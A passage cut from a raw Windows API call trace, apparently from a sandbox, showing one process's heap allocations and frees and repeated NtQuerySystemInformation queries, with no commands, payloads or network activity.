0x2026c630000 [0272.001] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x108) returned 0x2026c692000 [0272.001] GetProcessHeap () returned 0x2026c630000 [0272.001] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x30) returned 0x2026d88a030 [0272.001] GetProcessHeap () returned 0x2026c630000 [0272.001] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x110) returned 0x2026d242390 [0272.001] GetProcessHeap () returned 0x2026c630000 [0272.001] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d807140 [0272.001] GetProcessHeap () returned 0x2026c630000 [0272.001] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d9ea0 [0272.001] GetProcessHeap () returned 0x2026c630000 [0272.001] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d242270 | out: hHeap=0x2026c630000) returned 1 [0272.001] GetProcessHeap () returned 0x2026c630000 [0272.001] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x1c4) returned 0x2026d732bc0 [0272.002] GetProcessHeap () returned 0x2026c630000 [0272.002] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xfc) returned 0x2026c691cd0 [0272.002] GetModuleHandleExW (in: dwFlags=0x1, lpModuleName="ntdll.dll", phModule=0xc751dfde08 | out: phModule=0xc751dfde08*=0x7ffcea380000) returned 1 [0272.002] GetProcAddress (hModule=0x7ffcea380000, lpProcName="NtQuerySystemInformation") returned 0x7ffcea425a50 [0272.002] NtQuerySystemInformation (in: SystemInformationClass=0x86, SystemInformation=0xc751dfdf30, Length=0x20, ResultLength=0x0 | out: SystemInformation=0xc751dfdf30, ResultLength=0x0) returned 0x0 [0272.002] GetProcessHeap () returned 0x2026c630000 [0272.003] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x30) returned 0x2026d889bb0 [0272.003] GetProcessHeap () returned 0x2026c630000 [0272.003] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x48) returned 0x2026d790620 [0272.003] GetProcessHeap () returned 0x2026c630000 [0272.003] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d806850 [0272.003] GetProcessHeap () returned 0x2026c630000 [0272.003] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d9d10 [0272.003] GetProcessHeap () returned 0x2026c630000 [0272.003] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x34) returned 0x2026d889fb0 [0272.003] GetProcessHeap () returned 0x2026c630000 [0272.003] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c692000 | out: hHeap=0x2026c630000) returned 1 [0272.003] GetProcessHeap () returned 0x2026c630000 [0272.003] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d242390 | out: hHeap=0x2026c630000) returned 1 [0272.003] GetProcessHeap () returned 0x2026c630000 [0272.003] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d807140 | out: hHeap=0x2026c630000) returned 1 [0272.003] GetProcessHeap () returned 0x2026c630000 [0272.003] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d9ea0 | out: hHeap=0x2026c630000) returned 1 [0272.003] GetProcessHeap () returned 0x2026c630000 [0272.003] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d88a030 | out: hHeap=0x2026c630000) returned 1 [0272.004] GetProcessHeap () returned 0x2026c630000 [0272.004] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d732bc0 | out: hHeap=0x2026c630000) returned 1 [0272.004] GetProcessHeap () returned 0x2026c630000 [0272.004] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c691cd0 | out: hHeap=0x2026c630000) returned 1 [0272.004] GetProcessHeap () returned 0x2026c630000 [0272.004] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d790620 | out: hHeap=0x2026c630000) returned 1 [0272.004] GetProcessHeap () returned 0x2026c630000 [0272.004] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d806850 | out: hHeap=0x2026c630000) returned 1 [0272.004] GetProcessHeap () returned 0x2026c630000 [0272.004] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d9d10 | out: hHeap=0x2026c630000) returned 1 [0272.004] GetProcessHeap () returned 0x2026c630000 [0272.004] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d889bb0 | out: hHeap=0x2026c630000) returned 1 [0272.004] GetProcessHeap () returned 0x2026c630000 [0272.004] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d790e40 | out: hHeap=0x2026c630000) returned 1 [0272.005] GetProcessHeap () returned 0x2026c630000 [0272.005] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c692bb0 | out: hHeap=0x2026c630000) returned 1 [0272.005] GetProcessHeap () returned 0x2026c630000 [0272.005] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d889fb0 | out: hHeap=0x2026c630000) returned 1 [0272.005] GetProcessHeap () returned 0x2026c630000 [0272.005] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d805eb0 | out: hHeap=0x2026c630000) returned 1 [0272.005] GetProcessHeap () returned 0x2026c630000 [0272.005] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d9e80 | out: hHeap=0x2026c630000) returned 1 [0272.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.008] GetProcessHeap () returned 0x2026c630000 [0272.008] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d8060c0 [0272.008] GetProcessHeap () returned 0x2026c630000 [0272.008] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d9d70 [0272.008] GetProcessHeap () returned 0x2026c630000 [0272.008] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xb8) returned 0x2026d29cc00 [0272.009] GetProcessHeap () returned 0x2026c630000 [0272.009] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xc0) returned 0x2026d314e20 [0272.009] GetProcessHeap () returned 0x2026c630000 [0272.009] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x30) returned 0x2026d8895b0 [0272.009] GetProcessHeap () returned 0x2026c630000 [0272.009] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xc8) returned 0x2026d315570 [0272.009] GetProcessHeap () returned 0x2026c630000 [0272.009] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d8071f0 [0272.009] GetProcessHeap () returned 0x2026c630000 [0272.009] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d9d30 [0272.009] GetProcessHeap () returned 0x2026c630000 [0272.009] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d316000 | out: hHeap=0x2026c630000) returned 1 [0272.009] GetProcessHeap () returned 0x2026c630000 [0272.009] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x17c) returned 0x2026c724f20 [0272.010] GetProcessHeap () returned 0x2026c630000 [0272.010] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xdc) returned 0x2026c63d8e0 [0272.010] GetModuleHandleExW (in: dwFlags=0x1, lpModuleName="ntdll.dll", phModule=0xc751dfdf30 | out: phModule=0xc751dfdf30*=0x7ffcea380000) returned 1 [0272.010] GetProcAddress (hModule=0x7ffcea380000, lpProcName="NtQuerySystemInformation") returned 0x7ffcea425a50 [0272.010] NtQuerySystemInformation (in: SystemInformationClass=0x86, SystemInformation=0xc751dfdfe8, Length=0x20, ResultLength=0x0 | out: SystemInformation=0xc751dfdfe8, ResultLength=0x0) returned 0x0 [0272.010] GetProcessHeap () returned 0x2026c630000 [0272.010] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x30) returned 0x2026d88a0b0 [0272.010] GetProcessHeap () returned 0x2026c630000 [0272.010] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x28) returned 0x2026d6569c0 [0272.010] GetProcessHeap () returned 0x2026c630000 [0272.011] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d807820 [0272.011] GetProcessHeap () returned 0x2026c630000 [0272.011] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d9b90 [0272.011] GetProcessHeap () returned 0x2026c630000 [0272.011] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x14) returned 0x2026d719ee0 [0272.011] GetProcessHeap () returned 0x2026c630000 [0272.011] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d314e20 | out: hHeap=0x2026c630000) returned 1 [0272.011] GetProcessHeap () returned 0x2026c630000 [0272.011] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d315570 | out: hHeap=0x2026c630000) returned 1 [0272.011] GetProcessHeap () returned 0x2026c630000 [0272.011] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d8071f0 | out: hHeap=0x2026c630000) returned 1 [0272.011] GetProcessHeap () returned 0x2026c630000 [0272.011] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d9d30 | out: hHeap=0x2026c630000) returned 1 [0272.011] GetProcessHeap () returned 0x2026c630000 [0272.011] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d8895b0 | out: hHeap=0x2026c630000) returned 1 [0272.011] GetProcessHeap () returned 0x2026c630000 [0272.011] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c724f20 | out: hHeap=0x2026c630000) returned 1 [0272.011] GetProcessHeap () returned 0x2026c630000 [0272.011] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c63d8e0 | out: hHeap=0x2026c630000) returned 1 [0272.011] GetProcessHeap () returned 0x2026c630000 [0272.011] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6569c0 | out: hHeap=0x2026c630000) returned 1 [0272.011] GetProcessHeap () returned 0x2026c630000 [0272.011] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d807820 | out: hHeap=0x2026c630000) returned 1 [0272.011] GetProcessHeap () returned 0x2026c630000 [0272.011] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d9b90 | out: hHeap=0x2026c630000) returned 1 [0272.011] GetProcessHeap () returned 0x2026c630000 [0272.011] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d88a0b0 | out: hHeap=0x2026c630000) returned 1 [0272.011] GetProcessHeap () returned 0x2026c630000 [0272.012] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d656b70 | out: hHeap=0x2026c630000) returned 1 [0272.012] GetProcessHeap () returned 0x2026c630000 [0272.012] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d29cc00 | out: hHeap=0x2026c630000) returned 1 [0272.012] GetProcessHeap () returned 0x2026c630000 [0272.012] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d719ee0 | out: hHeap=0x2026c630000) returned 1 [0272.012] GetProcessHeap () returned 0x2026c630000 [0272.012] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d8060c0 | out: hHeap=0x2026c630000) returned 1 [0272.012] GetProcessHeap () returned 0x2026c630000 [0272.012] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d9d70 | out: hHeap=0x2026c630000) returned 1 [0272.012] GetProcessHeap () returned 0x2026c630000 [0272.012] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d807140 [0272.012] GetProcessHeap () returned 0x2026c630000 [0272.012] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d9e50 [0272.012] GetProcessHeap () returned 0x2026c630000 [0272.012] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xc658) returned 0x2026d6c2ec0 [0272.014] GetProcessHeap () returned 0x2026c630000 [0272.014] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xc660) returned 0x2026d892030 [0272.016] GetProcessHeap () returned 0x2026c630000 [0272.016] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x30) returned 0x2026d889bb0 [0272.016] GetProcessHeap () returned 0x2026c630000 [0272.016] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xc668) returned 0x2026d6db1f0 [0272.017] GetProcessHeap () returned 0x2026c630000 [0272.017] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d807820 [0272.017] GetProcessHeap () returned 0x2026c630000 [0272.017] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d9c60 [0272.017] GetProcessHeap () returned 0x2026c630000 [0272.017] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d89e6a0 | out: hHeap=0x2026c630000) returned 1 [0272.018] GetProcessHeap () returned 0x2026c630000 [0272.018] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xc71c) returned 0x2026d89e6a0 [0272.018] GetProcessHeap () returned 0x2026c630000 [0272.018] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xcc) returned 0x2026d423950 [0272.018] GetModuleHandleExW (in: dwFlags=0x1, lpModuleName="ntdll.dll", phModule=0xc751dfdfb0 | out: phModule=0xc751dfdfb0*=0x7ffcea380000) returned 1 [0272.018] GetProcAddress (hModule=0x7ffcea380000, lpProcName="NtQuerySystemInformation") returned 0x7ffcea425a50 [0272.018] NtQuerySystemInformation (in: SystemInformationClass=0x86, SystemInformation=0xc751dfe008, Length=0x20, ResultLength=0x0 | out: SystemInformation=0xc751dfe008, ResultLength=0x0) returned 0x0 [0272.034] GetProcessHeap () returned 0x2026c630000 [0272.034] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x30) returned 0x2026d889fb0 [0272.034] GetProcessHeap () returned 0x2026c630000 [0272.034] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x18) returned 0x2026d719ce0 [0272.035] GetProcessHeap () returned 0x2026c630000 [0272.035] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d805f60 [0272.035] GetProcessHeap () returned 0x2026c630000 [0272.035] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d9ab0 [0272.035] GetProcessHeap () returned 0x2026c630000 [0272.035] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d9c50 [0272.035] GetProcessHeap () returned 0x2026c630000 [0272.035] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d892030 | out: hHeap=0x2026c630000) returned 1 [0272.035] GetProcessHeap () returned 0x2026c630000 [0272.035] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6db1f0 | out: hHeap=0x2026c630000) returned 1 [0272.035] GetProcessHeap () returned 0x2026c630000 [0272.035] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d807820 | out: hHeap=0x2026c630000) returned 1 [0272.035] GetProcessHeap () returned 0x2026c630000 [0272.035] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d9c60 | out: hHeap=0x2026c630000) returned 1 [0272.035] GetProcessHeap () returned 0x2026c630000 [0272.035] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d889bb0 | out: hHeap=0x2026c630000) returned 1 [0272.035] GetProcessHeap () returned 0x2026c630000 [0272.035] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d89e6a0 | out: hHeap=0x2026c630000) returned 1 [0272.035] GetProcessHeap () returned 0x2026c630000 [0272.035] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d423950 | out: hHeap=0x2026c630000) returned 1 [0272.035] GetProcessHeap () returned 0x2026c630000 [0272.035] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d719ce0 | out: hHeap=0x2026c630000) returned 1 [0272.035] GetProcessHeap () returned 0x2026c630000 [0272.035] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d805f60 | out: hHeap=0x2026c630000) returned 1 [0272.035] GetProcessHeap () returned 0x2026c630000 [0272.035] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d9ab0 | out: hHeap=0x2026c630000) returned 1 [0272.035] GetProcessHeap () returned 0x2026c630000 [0272.035] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d889fb0 | out: hHeap=0x2026c630000) returned 1 [0272.035] GetProcessHeap () returned 0x2026c630000 [0272.035] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d7198e0 | out: hHeap=0x2026c630000) returned 1 [0272.036] GetProcessHeap () returned 0x2026c630000 [0272.036] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6c2ec0 | out: hHeap=0x2026c630000) returned 1 [0272.036] GetProcessHeap () returned 0x2026c630000 [0272.036] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d9c50 | out: hHeap=0x2026c630000) returned 1 [0272.036] GetProcessHeap () returned 0x2026c630000 [0272.036] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d807140 | out: hHeap=0x2026c630000) returned 1 [0272.036] GetProcessHeap () returned 0x2026c630000 [0272.036] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d9e50 | out: hHeap=0x2026c630000) returned 1 [0272.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda70, Length=0x50, ResultLength=0x0) [0272.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda70, Length=0x50, ResultLength=0x0) [0272.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda70, Length=0x50, ResultLength=0x0) [0272.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd960, Length=0x50, ResultLength=0x0) [0272.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd960, Length=0x50, ResultLength=0x0) [0272.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd960, Length=0x50, ResultLength=0x0) [0272.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd960, Length=0x50, ResultLength=0x0) [0272.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd890, Length=0x38, ResultLength=0x0) [0272.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6c0, Length=0x28, ResultLength=0x0) [0272.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6c0, Length=0x28, ResultLength=0x0) [0272.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6c0, Length=0x28, ResultLength=0x0) [0272.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6c0, Length=0x28, ResultLength=0x0) [0272.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd730, Length=0x28, ResultLength=0x0) [0272.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd890, Length=0x38, ResultLength=0x0) [0272.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7b0, Length=0x28, ResultLength=0x0) [0272.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7b0, Length=0x28, ResultLength=0x0) [0272.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd650, Length=0x20, ResultLength=0x0) [0272.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd5d0, Length=0x20, ResultLength=0x0) [0272.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd5d0, Length=0x20, ResultLength=0x0) [0272.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd5d0, Length=0x20, ResultLength=0x0) [0272.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd890, Length=0x38, ResultLength=0x0) [0272.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd890, Length=0x38, ResultLength=0x0) [0272.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd710, Length=0x20, ResultLength=0x0) [0272.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6a0, Length=0x20, ResultLength=0x0) [0272.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6a0, Length=0x20, ResultLength=0x0) [0272.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbd0, Length=0x50, ResultLength=0x0) [0272.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbd0, Length=0x50, ResultLength=0x0) [0272.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbd0, Length=0x50, ResultLength=0x0) [0272.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdac0, Length=0x50, ResultLength=0x0) [0272.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdac0, Length=0x50, ResultLength=0x0) [0272.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdac0, Length=0x50, ResultLength=0x0) [0272.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdac0, Length=0x50, ResultLength=0x0) [0272.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9f0, Length=0x38, ResultLength=0x0) [0272.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd820, Length=0x28, ResultLength=0x0) [0272.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd820, Length=0x28, ResultLength=0x0) [0272.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd820, Length=0x28, ResultLength=0x0) [0272.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.051] NtQuerySystemInformation (SystemInformationClass=0xb9, 